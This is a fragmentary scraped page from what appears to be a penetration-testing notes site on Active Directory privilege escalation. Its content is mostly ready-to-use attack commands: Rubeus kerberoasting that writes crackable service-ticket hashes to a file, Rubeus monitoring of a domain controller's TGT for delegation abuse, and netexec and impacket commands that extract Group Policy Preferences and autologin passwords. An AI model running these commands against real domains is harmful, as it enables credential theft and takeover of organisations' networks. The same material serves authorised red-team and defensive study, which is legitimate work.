Skip to main content Link Menu Expand (external link) Document Search Copy Copied

privesc / ad

Mitre Att&ck Entreprise: TA0007 - Discovery

Menu

Tools

_repo_last_push_stars_watch_language

dacl

credit: thehacker.repices ad privesc DACLs

kerberos

kerberoasting

Rubeus.exe -args kerberoast /user:$ztarg_user_name /simple /rc4opsec /outfile:hashes.txt

delegations

recipes / slides

# KUD server: monitor the TGT
Rubeus.exe -args %Pwn% /targetuser:DCORP-DC$ /interval:5 /nowrap


## <a name='vuln_user_accounts_dormant'></a>vuln_user_accounts_dormant

```powershell
pwdLastSet

shoot-gpo

gpp-password

# cme
netexec smb $zdom_dc_ip -u $ztarg_user_name -p $ztarg_user_pass -M gpp_pasword
netexec smb $zdom_dc_ip -u $ztarg_user_name -p $ztarg_user_pass -M gpp_autologin

# impacket
Get-GPPPassword.py $zz